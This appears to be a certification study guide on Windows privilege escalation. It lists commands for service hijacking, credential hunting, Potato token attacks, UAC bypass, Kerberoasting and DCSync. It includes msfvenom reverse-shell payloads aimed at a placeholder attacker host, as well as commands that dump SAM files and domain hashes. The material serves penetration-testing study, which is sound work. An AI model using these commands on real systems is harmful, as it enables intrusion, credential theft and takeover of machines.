Windows Privilege Escalation Guide

A comprehensive reference guide for Windows privilege escalation techniques. This guide is designed as a study aid for GPEN certification and practical penetration testing.

Table of Contents

1. Enumeration

System Information

Gather OS version, architecture, hotfixes to identify missing patches.

systeminfo
# Displays detailed system information including OS version, build number,
# installed hotfixes (patches), system architecture, and domain info.
# This is your starting point - look for missing patches that have known exploits.

hostname
# Shows the computer name. Useful for identifying the machine and understanding
# the naming convention (might hint at its role: WEB01, DC01, etc.)

whoami /all
# Shows current username, SID (Security Identifier), group memberships,
# and ALL privileges assigned to your token. The privileges section is critical
# for identifying privesc opportunities like SeImpersonatePrivilege.

wmic qfe list
# Lists all installed Windows updates/hotfixes (Quick Fix Engineering).
# Compare against known vulnerable versions to find missing security patches.
# Format: HotFixID, InstalledOn date, Description

wmic os get osarchitecture
# Shows if the system is 32-bit (x86) or 64-bit (x64).
# Important for selecting correct exploit binaries and payloads.

EXAM TIP: Always start with systeminfo - look for missing KBs that correspond to known exploits.

MITRE ATT&CK: T1082

User & Group Enumeration

Identify current privileges, group memberships, and other users.

whoami /priv
# Lists all privileges assigned to your current access token.
# KEY PRIVILEGES TO LOOK FOR:
# - SeImpersonatePrivilege: Can impersonate tokens (Potato attacks)
# - SeDebugPrivilege: Can debug processes (dump memory, inject code)
# - SeBackupPrivilege: Can read any file (backup operators)
# - SeRestorePrivilege: Can write any file
# - SeTakeOwnershipPrivilege: Can take ownership of objects

whoami /groups
# Shows all groups the current user belongs to.
# Look for: Administrators, Backup Operators, Remote Desktop Users,
# and any custom groups that might have elevated permissions.

net user
# Lists all local user accounts on the system.
# Helps identify other accounts to potentially target or impersonate.

net localgroup administrators
# Shows all members of the local Administrators group.
# These are your targets - accounts with full system access.

net user <username>
# Shows detailed info about a specific user: password policy,
# last logon, group memberships, account status (enabled/disabled).

EXAM TIP: Check for SeImpersonatePrivilege, SeDebugPrivilege, SeBackupPrivilege - these are privesc goldmines.

MITRE ATT&CK: T1033, T1069

Network Information

ipconfig /all
# Shows all network interfaces with full details: IP addresses,
# subnet masks, default gateways, DNS servers, DHCP info.
# Look for multiple interfaces (might indicate dual-homed host).

netstat -ano
# Lists all active network connections and listening ports.
# -a: all connections, -n: numeric (no DNS resolution), -o: shows process ID
# Look for: internal services, connections to other hosts, unusual ports

arp -a
# Shows the ARP cache - IP to MAC address mappings.
# Reveals other hosts on the local network that this machine has communicated with.

route print
# Displays the routing table - shows how traffic is routed.
# Can reveal other network segments this host can reach.

MITRE ATT&CK: T1016, T1049

Automated Enumeration Tools

# PowerUp (PowerSploit)
Import-Module .\PowerUp.ps1
Invoke-AllChecks
# PowerUp is a PowerShell script that checks for common Windows privilege
# escalation vectors. Invoke-AllChecks runs ALL checks at once:
# - Unquoted service paths
# - Modifiable services
# - Modifiable service binaries
# - AlwaysInstallElevated
# - Autologon credentials
# - Cached GPP passwords
# Returns actionable results with abuse functions you can run.

# winPEAS
.\winPEASany.exe
# Windows Privilege Escalation Awesome Scripts - comprehensive enumeration.
# Color-coded output: RED = almost certain privesc, YELLOW = possible
# Checks everything: services, scheduled tasks, credentials, network, etc.
# Very thorough but generates lots of output - learn to read it efficiently.

# Seatbelt
.\Seatbelt.exe -group=all
# C# tool that performs security-focused host enumeration.
# Groups: all, user, system, slack, chrome, remote, misc
# More targeted than winPEAS, excellent for specific checks.

# SharpUp
.\SharpUp.exe
# C# port of PowerUp's functionality.
# Useful when PowerShell is blocked or being monitored.
# Same checks as PowerUp but compiled as an executable.

EXAM TIP: PowerUp is essential - know Invoke-AllChecks and what each check looks for.

2. Misconfigurations

Unquoted Service Paths

Services with spaces in path and no quotes allow DLL/EXE hijacking.

How it works: When Windows starts a service with an unquoted path containing spaces, it tries to execute each “portion” of the path. For C:\Program Files\My App\service.exe, Windows tries:

1. C:\Program.exe
2. C:\Program Files\My.exe
3. C:\Program Files\My App\service.exe

If you can write to any of these locations, you can hijack the service.

# Find unquoted paths
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """
# This command:
# - Gets service name, path, and start mode
# - Filters OUT paths in C:\Windows (usually not writable)
# - Filters OUT paths that ARE quoted (have ")
# What remains are potentially exploitable unquoted paths.

# PowerUp check
Get-UnquotedService
# PowerUp function that finds unquoted service paths AND checks
# if any path segments are writable by the current user.
# Returns only actionable results.

# Exploit: Place malicious exe in writable path segment
# Example: C:\Program Files\My App\service.exe
# If C:\ is writable, place C:\Program.exe (your payload)
# If C:\Program Files\ is writable, place C:\Program Files\My.exe
# Restart the service and your payload executes as SYSTEM.

EXAM TIP: Classic exam question - understand WHY Windows searches each path segment.

MITRE ATT&CK: T1574.009

Weak Service Permissions

Services where low-priv users can modify config or binary.

How it works: Windows services have ACLs (Access Control Lists) that define who can start, stop, or configure them. If a low-privilege user has SERVICE_CHANGE_CONFIG permission, they can change the service’s binary path to point to a malicious executable.

# Check service permissions with accesschk
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# accesschk is a Sysinternals tool that shows effective permissions.
# -u: suppress errors, -w: show write access only
# -c: service name, -q: quiet (no banner), -v: verbose
# "Authenticated Users" - check what this group can modify
# Look for SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG

accesschk.exe -uwcqv "Users" * /accepteula
# Same check for the Users group.
# Any service with write permissions for these groups is exploitable.

# PowerUp
Get-ModifiableService
# Finds services where current user can modify the configuration.
# Returns service name and the specific permission you have.

# Modify service binary path
sc config <svc> binpath= "C:\temp\shell.exe"
# sc (Service Control) modifies service configuration.
# binpath= sets the executable path (note the space after =)
# Point it to your reverse shell or other payload.

sc stop <svc>
# Stop the service (need permission, or wait for reboot)

sc start <svc>
# Start the service - executes your payload as SYSTEM
# May need to wait for automatic restart or system reboot.

EXAM TIP: Look for SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS for non-admin users.

MITRE ATT&CK: T1574.011

Weak File/Folder Permissions

# Check permissions on service binary
icacls "C:\path\to\service.exe"
# icacls shows file/folder permissions in Windows.
# Look for: (F) Full control, (M) Modify, (W) Write
# If "Users" or "Everyone" has write access, you can replace the binary.

# accesschk for writable directories
accesschk.exe -uwdqs Users C:\
# -d: directory, -s: recurse subdirectories
# Finds all directories writable by Users group.
# Useful for finding where to drop payloads.

accesschk.exe -uwdqs "Authenticated Users" C:\
# Same check for Authenticated Users group.

# PowerUp
Get-ModifiableServiceFile
# Finds services where you can modify the actual binary file.
# Different from modifiable service config - this is the EXE itself.

MITRE ATT&CK: T1574.010

AlwaysInstallElevated

Registry setting allowing any user to install MSI as SYSTEM.

How it works: When both HKLM and HKCU registry keys are set to 1, any user can install MSI packages with SYSTEM privileges. This is a massive security hole - you just create a malicious MSI and install it.

# Check registry keys (both must be 1)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Queries the Local Machine policy. Must return 0x1 (enabled).

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Queries the Current User policy. Must ALSO return 0x1.
# BOTH keys must be set to 1 for this attack to work!

# Generate malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > shell.msi
# msfvenom creates payloads. -p specifies payload type.
# -f msi outputs as Windows Installer package.
# The MSI will execute your reverse shell when installed.

# Install
msiexec /quiet /qn /i shell.msi
# msiexec is the Windows Installer tool.
# /quiet: no user interaction, /qn: no UI at all
# /i: install the package
# Runs silently and gives you a SYSTEM shell.

EXAM TIP: Both HKLM and HKCU keys must be set to 1 for this to work.

MITRE ATT&CK: T1574.007

Registry Autoruns

# Common autorun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Programs here run at startup for ALL users.
# If you can modify these entries or the binaries they point to,
# your payload runs next time any user logs in.

reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Programs here run at startup for the CURRENT user only.
# Easier to modify but only triggers for this user.

# Check permissions on autorun binaries
accesschk.exe -wvu "C:\path\to\autorun.exe"
# -v: verbose, shows all permissions
# If you can write to the binary, replace it with payload.
# Wait for reboot/logon and your code runs.

MITRE ATT&CK: T1547.001

3. Credential Hunting

Credentials in Files

# Search for password strings
findstr /si password *.txt *.ini *.config *.xml
# findstr is Windows grep. Searches file contents.
# /s: search subdirectories, /i: case-insensitive
# Searches common config file types for "password"

findstr /spin "password" *.*
# /p: skip non-printable characters, /n: show line numbers
# Broader search across all file types.

# Common locations
type C:\unattend.xml
# Unattend.xml is used for automated Windows installations.
# Often contains plaintext admin passwords! Check for:
# <AutoLogon>, <AdministratorPassword> sections

type C:\sysprep\sysprep.xml
# Similar to unattend.xml - used for system preparation.
# May contain base64-encoded admin passwords.

type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# PowerShell command history! Users often type passwords in commands.
# Example: "Connect-MsolService -Credential $cred" might show passwords
# in previous commands. Goldmine for lazy admins.

# IIS config
type C:\inetpub\wwwroot\web.config
# IIS web application config file.
# Often contains database connection strings with plaintext passwords.

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
# Machine-level .NET config. May have connection strings.

EXAM TIP: PowerShell history and unattend.xml are frequently tested.

MITRE ATT&CK: T1552.001

Registry Credentials

# Autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Windows autologon stores credentials in registry!
# Look for: DefaultUserName, DefaultPassword, DefaultDomainName
# If autologon is configured, password is stored in plaintext.

# VNC passwords
reg query "HKCU\Software\ORL\WinVNC3\Password"
# VNC stores passwords in registry (weakly encrypted).
# Can be decrypted with vncpwd or online tools.

# Putty saved sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
# PuTTY SSH client saves session configurations.
# May include: hostnames, usernames, sometimes proxy passwords.
# /s recurses through all saved sessions.

MITRE ATT&CK: T1552.002

Saved Credentials

# List saved credentials
cmdkey /list
# Shows credentials stored in Windows Credential Manager.
# These can be used with runas without knowing the password!
# Look for: Domain credentials, "virtualapp/didlogical" entries

# Use saved creds with runas
runas /savecred /user:admin cmd.exe
# /savecred uses stored credentials without prompting.
# If admin creds are saved, instant privilege escalation!
# Works even if you don't know the actual password.

# Extract with Mimikatz
sekurlsa::credman
# Mimikatz can dump Credential Manager contents.
# Shows plaintext passwords from the credential vault.

EXAM TIP: If cmdkey shows stored creds, runas /savecred is an easy win.

MITRE ATT&CK: T1555.004

SAM & SYSTEM Files

# Check for backup files
dir C:\Windows\Repair\SAM
# SAM (Security Account Manager) contains local password hashes.
# Can't read live SAM, but backup copies might be accessible.

dir C:\Windows\System32\config\RegBack\
# Registry backup folder. May contain SAM and SYSTEM copies.
# SYSTEM file has the boot key needed to decrypt SAM hashes.

# Volume Shadow Copy
vssadmin list shadows
# Lists all Volume Shadow Copies (system restore points).
# Shadow copies contain backups of system files including SAM!

# Extract from shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
# Access files from shadow copy using device path.
# Now you have SAM and SYSTEM files to crack offline!

# Dump with secretsdump
secretsdump.py -sam SAM -system SYSTEM LOCAL
# Impacket's secretsdump extracts hashes from SAM file.
# -system provides boot key for decryption.
# Outputs NTLM hashes that can be cracked or used for pass-the-hash.

MITRE ATT&CK: T1003.002

4. Token Impersonation

Potato Attacks

Abuse SeImpersonatePrivilege to escalate to SYSTEM.

How it works: Service accounts (like IIS, SQL Server) often have SeImpersonatePrivilege. Potato attacks trick a SYSTEM process into authenticating to you, then impersonate that token to become SYSTEM.

# Check for SeImpersonatePrivilege
whoami /priv
# Look for "SeImpersonatePrivilege" in the output.
# If "Enabled", you can perform token impersonation attacks.
# Common on: IIS AppPool accounts, SQL Server accounts, service accounts

# JuicyPotato (pre-2019)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
# -l: local COM server port
# -p: program to run as SYSTEM
# -t *: try both CreateProcessWithToken and CreateProcessAsUser
# -c: CLSID of a COM server that runs as SYSTEM
# Works on Windows 7/8/2008/2012/2016 (before patches)

# PrintSpoofer (2019+)
PrintSpoofer.exe -i -c cmd
# Abuses the Print Spooler service to get SYSTEM token.
# -i: interactive console, -c: command to run
# Works on Windows 10/Server 2016/2019 where JuicyPotato is patched.
# Simpler to use - no CLSID hunting required.

# RoguePotato
RoguePotato.exe -r <attacker_ip> -e "cmd.exe" -l 9999
# Requires a machine you control to act as rogue OXID resolver.
# -r: attacker IP running socat redirect
# -e: executable to run, -l: local port
# More complex but works in more situations.

# GodPotato (2022+)
GodPotato.exe -cmd "cmd /c whoami"
# Latest in the Potato family. Works on very recent Windows.
# Simpler syntax - just specify command to run.
# Preferred choice for modern Windows systems.

EXAM TIP: Service accounts often have SeImpersonatePrivilege - Potato family exploits are essential.

Potato Variants: JuicyPotato, RoguePotato, PrintSpoofer, SweetPotato, GodPotato

MITRE ATT&CK: T1134.001

Token Stealing

# Incognito (Metasploit)
load incognito
# Loads the incognito extension in Meterpreter.
# Allows token manipulation and impersonation.

list_tokens -u
# Lists available tokens by user.
# Shows tokens that can be impersonated from current position.
# Look for: NT AUTHORITY\SYSTEM, Domain Admins, high-priv users

impersonate_token "NT AUTHORITY\SYSTEM"
# Impersonates the SYSTEM token.
# Now all your actions run as SYSTEM!
# Can impersonate any token shown in list_tokens.

# Migrate to SYSTEM process in meterpreter
migrate <SYSTEM_PID>
# Moves your Meterpreter session into a SYSTEM process.
# Find SYSTEM PIDs with: ps | grep -i system
# Common targets: lsass.exe, services.exe, winlogon.exe
# Gives you SYSTEM privileges if migration succeeds.

MITRE ATT&CK: T1134.001

5. Kernel Exploits

Finding Vulnerable Kernel

# Get OS and patch info
systeminfo
# Note the OS version, build number, and installed hotfixes.
# Cross-reference with known vulnerable versions.

# Windows Exploit Suggester
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt
# Compares systeminfo output against Microsoft Security Bulletins.
# --database: Excel file with vulnerability data (update regularly!)
# --systeminfo: output of systeminfo command saved to file
# Returns list of potentially applicable exploits.

# Watson (.NET)
Watson.exe
# C# tool that checks for missing KBs related to privilege escalation.
# Runs locally, doesn't need database file.
# More up-to-date than Windows Exploit Suggester.

# Sherlock (PowerShell - older)
Import-Module .\Sherlock.ps1
Find-AllVulns
# PowerShell script for finding kernel vulns.
# Older, doesn't include recent CVEs.
# Watson or WES-NG are preferred now.

EXAM TIP: Know the major kernel CVEs by OS version - MS16-032, MS17-010, etc.

MITRE ATT&CK: T1068

Common Kernel CVEs

# MS16-032 (Secondary Logon)
Invoke-MS16032
# Affects Windows 7/8/10, Server 2008/2012
# Race condition in Secondary Logon service
# Reliable, commonly works, PowerShell script available.

# MS17-010 (EternalBlue)
# The famous SMB vulnerability used by WannaCry.
# Usually exploited remotely, but local variants exist.
# Affects: Windows 7/8/2008/2012 without KB4012212

# CVE-2021-1732 (Win32k)
# Win32k elevation of privilege vulnerability.
# Affects Windows 10/Server 2016/2019

# CVE-2021-34527 (PrintNightmare)
# Print Spooler vulnerability - both RCE and LPE.
# Can add local admin users via Point and Print.
# Very widespread impact.

# CVE-2022-21999 (SpoolFool)
# Another Print Spooler elevation of privilege.
# Affects multiple Windows versions.

Key CVEs: MS16-032, MS17-010, PrintNightmare, HiveNightmare/SeriousSAM

6. Scheduled Tasks

Enumerate Tasks

# List all scheduled tasks
schtasks /query /fo LIST /v
# Shows all scheduled tasks with verbose details.
# /fo LIST: output format, /v: verbose
# Look for tasks running as SYSTEM with writable binaries.

# PowerUp check
Get-ModifiableScheduledTaskFile
# Finds scheduled tasks where you can modify the binary.
# Returns actionable results only.

# Check task file permissions
accesschk.exe -dqv "C:\TaskScripts\"
# Check who can write to directories containing task scripts.
# If writable, replace scripts with malicious versions.

# Task details
schtasks /query /tn "TaskName" /fo LIST /v
# Get detailed info about a specific task.
# /tn: task name to query
# Shows: run times, run as user, actions, triggers

MITRE ATT&CK: T1053.005

Exploiting Tasks

# If task binary is writable:
copy malicious.exe "C:\path\to\task.exe"
# Replace the legitimate binary with your payload.
# Use same filename so task doesn't break.
# Payload runs with the task's privileges (often SYSTEM).

# Wait for task to run or trigger manually
schtasks /run /tn "TaskName"
# Manually triggers a scheduled task.
# May need appropriate permissions.
# Otherwise, wait for scheduled execution time.

7. DLL Hijacking

DLL Search Order

How it works: When an application loads a DLL without a full path, Windows searches directories in a specific order. If you can write to a directory searched before the legitimate DLL location, your malicious DLL loads instead.

Windows DLL Search Order:
1. Application directory (where the .exe is)
2. System directory (C:\Windows\System32)
3. 16-bit system directory
4. Windows directory (C:\Windows)
5. Current directory
6. PATH directories

# Find missing DLLs with Process Monitor
# Filter: Result = NAME NOT FOUND, Path ends with .dll
# This shows DLLs the application tried to load but couldn't find.
# If you can write to a searched location, you can hijack!

EXAM TIP: Understand SafeDllSearchMode and how it affects search order.

MITRE ATT&CK: T1574.001

Exploiting DLL Hijack

# Generate malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > hijack.dll
# Creates a DLL payload that spawns a reverse shell.
# -f dll: output format as DLL
# DLL executes when loaded by the target application.

# Place in writable location in search path
copy hijack.dll C:\WritableDir\missing.dll
# Name must match what the application is looking for.
# Place in directory that's searched before the real DLL.

# Restart service/application
# The application loads your DLL, executing your payload.
# Payload runs with the application's privileges.

8. UAC Bypass

Check UAC Level

# Check UAC level
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
# EnableLUA=1 means UAC is enabled.
# EnableLUA=0 means UAC is disabled (rare in modern Windows).

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
# Determines how UAC prompts administrators.
# Values:
# 0 = No prompt (UAC effectively disabled for admins)
# 1 = Prompt for credentials on secure desktop
# 2 = Prompt for consent on secure desktop
# 5 = Prompt for consent for non-Windows binaries (default)

MITRE ATT&CK: T1548.002

Bypass Techniques

How it works: Certain Windows binaries auto-elevate without UAC prompts. We can hijack registry keys these binaries check and make them execute our payload with elevated privileges.

# Fodhelper bypass
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
# Creates a registry key that fodhelper.exe will check.
# /d: sets the default value (command to run)
# /f: force without confirmation

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
# Must add empty DelegateExecute value for bypass to work.
# /v: value name, /t REG_SZ: string type

fodhelper.exe
# Windows binary that auto-elevates.
# Checks our registry key before executing.
# Runs our cmd.exe as Administrator!

# Metasploit
use exploit/windows/local/bypassuac_fodhelper
# Automated module that performs the above steps.
# Set SESSION to your existing Meterpreter session.
# Returns new elevated session.

# UACME tool (many techniques)
Akagi64.exe <method_number> <payload>
# Collection of 60+ UAC bypass methods.
# Different methods work on different Windows versions.
# Example: Akagi64.exe 23 cmd.exe

EXAM TIP: Fodhelper bypass works on Win10 - frequently tested.

9. AD-Related PrivEsc

Kerberoasting

How it works: Any domain user can request service tickets for accounts with SPNs (Service Principal Names). The ticket is encrypted with the service account’s password hash. We request these tickets, extract them, and crack offline.

# Rubeus
Rubeus.exe kerberoast /outfile:hashes.txt
# Rubeus is a C# Kerberos abuse toolkit.
# kerberoast: requests TGS tickets for all accounts with SPNs
# /outfile: saves hashes in crackable format
# Hashes are in Hashcat/John format.

# Impacket
GetUserSPNs.py domain/user:password -dc-ip <DC_IP> -request
# Python alternative using Impacket library.
# Connects to DC and requests SPN tickets.
# -request: actually request the tickets (not just enumerate)

# PowerView
Invoke-Kerberoast -OutputFormat Hashcat
# PowerShell method using PowerView.
# Returns hashes formatted for Hashcat.

# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt
# -m 13100: Kerberos 5 TGS-REP etype 23 (rc4-hmac)
# Service accounts often have weak passwords.
# Domain admin service accounts = game over.

EXAM TIP: High-value topic - know the full attack chain.

MITRE ATT&CK: T1558.003

AS-REP Roasting

How it works: Accounts with “Do not require Kerberos pre-authentication” can be attacked. We request AS-REP without proving identity, getting a response encrypted with the user’s hash.

# Find vulnerable accounts
Get-DomainUser -PreauthNotRequired
# PowerView function to find users without pre-auth.
# These are targets for AS-REP roasting.

# Rubeus
Rubeus.exe asreproast /outfile:asrep.txt
# Requests AS-REP for vulnerable users.
# Saves crackable hashes to file.

# Impacket
GetNPUsers.py domain/ -usersfile users.txt -dc-ip <DC_IP>
# NP = No Pre-authentication required
# -usersfile: file containing usernames to try
# Can enumerate and request without credentials!

# Crack
hashcat -m 18200 asrep.txt wordlist.txt
# -m 18200: Kerberos 5 AS-REP etype 23
# Similar to Kerberoasting but targets user accounts.

MITRE ATT&CK: T1558.004

Group Policy Preferences

How it works: Pre-2014, Group Policy Preferences stored passwords in SYSVOL (readable by all domain users). Microsoft published the AES key, so any GPP password can be instantly decrypted.

# Find Groups.xml
findstr /S /I cpassword \\<domain>\sysvol\<domain>\policies\*.xml
# Searches SYSVOL for XML files containing "cpassword"
# cpassword is the GPP encrypted password field.
# /S: recursive, /I: case-insensitive

# Decrypt with gpp-decrypt
gpp-decrypt <cpassword_value>
# Tool that decrypts GPP passwords using Microsoft's published key.
# Instant decryption - no cracking needed!

# PowerSploit
Get-GPPPassword
# PowerShell function that automates the entire process.
# Finds and decrypts all GPP passwords in SYSVOL.

EXAM TIP: MS14-025 patched creation but old files may still exist.

MITRE ATT&CK: T1552.006

DCSync

How it works: Users with “Replicating Directory Changes All” rights can impersonate a domain controller and request password data via replication. Usually Domain/Enterprise Admins or accounts with delegated rights.

# Mimikatz
lsadump::dcsync /domain:domain.local /user:Administrator
# Requests replication data for specified user.
# Returns NTLM hash - can be used for pass-the-hash.
# /domain: target domain, /user: account to dump

# Impacket
secretsdump.py domain/user:password@DC_IP
# Python alternative for DCSync.
# Dumps all domain hashes if you have sufficient rights.
# Can also dump LSA secrets and cached credentials.

# Required rights:
# - Replicating Directory Changes
# - Replicating Directory Changes All
# Check with: Get-DomainObjectACL | ? { $_.ObjectAceType -like "*Replicating*" }

MITRE ATT&CK: T1003.006

10. Essential Tools

Enumeration Tools

• PowerUp (PowerSploit) - PowerShell privesc checks
• winPEAS - Comprehensive enumeration script
• Seatbelt - Security-focused C# enumeration
• SharpUp - C# port of PowerUp
• Windows Exploit Suggester - Matches systeminfo to exploits

Exploitation Tools

• Mimikatz - Credential extraction swiss army knife
• Rubeus - Kerberos abuse toolkit
• Impacket - Python network protocol library
• PrintSpoofer - Potato-style exploit for modern Windows
• GodPotato - Latest Potato variant

High-Priority Topics for Exams

• Unquoted Service Paths
• Weak Service Permissions
• AlwaysInstallElevated
• Token Impersonation (Potato)
• Credential Files (PS History)
• Kerberoasting
• GPP Passwords
• PowerUp Invoke-AllChecks

Related: Linux Privilege Escalation Guide